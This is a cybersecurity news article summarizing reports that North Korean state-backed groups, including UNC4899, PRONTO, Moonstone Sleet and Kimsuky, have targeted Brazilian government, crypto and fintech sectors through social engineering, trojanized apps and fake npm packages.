North Korean threat actors have been responsible for around one-third of all phishing activities aimed at Brazil since 2020, with cyber espionage groups increasingly focusing on the country’s growing influence.
In a recent report, Google’s Mandiant and Threat Analysis Group (TAG) highlighted that “government-backed North Korean actors have been targeting various sectors in Brazil, including the government, aerospace, technology, and financial services.”
Specifically, cryptocurrency and financial technology companies have been a prime target for three North Korean groups operating in Brazil.
One of the primary threat actors is known as UNC4899 (also alias Jade Sleet, PUKCHONG, and TraderTraitor), which has used a malicious Python app to target cryptocurrency professionals.
The attack method involves initial contact through social media, sending benign PDFs with job descriptions, and eventually distributing a malware-laced Python app disguised as a cryptocurrency tool.
Mandiant and TAG researchers described how UNC4899’s campaign involved sending a trojanized Python app to extract cryptocurrency data when certain conditions were met, highlighting a sophisticated social engineering tactic.
This method isn’t new as UNC4899 previously targeted individuals in blockchain, cryptocurrency, online gambling, and cybersecurity sectors through GitHub repositories housing malicious npm packages.
Another known North Korean group, PRONTO, had attempted to target diplomats by using decoy documents related to denuclearization and news, aiming to lure victims into providing login credentials.
These activities come after Microsoft revealed insights about Moonstone Sleet, a new North Korean threat actor targeting software, education, and defense sectors with ransomware and espionage attacks.
Moonstone Sleet is known for distributing malware through fake npm packages, similar to UNC4899, albeit with distinctive code structures.
Checkmarx researchers noted changes in the delivery method of Moonstone Sleet’s malware, indicating an evolution in their strategy.
While Moonstone Sleet’s tactic exploits the trust in open-source repositories, Kimsuky, another North Korean group, was found impersonating Reuters to target North Korean activists with information-stealing malware disguised as interview requests.
These discoveries highlight the need for heightened cybersecurity vigilance and awareness, especially in dealing with social engineering attacks.
If you found this article engaging, follow us on Twitter and LinkedIn for more exclusive content.
About Author
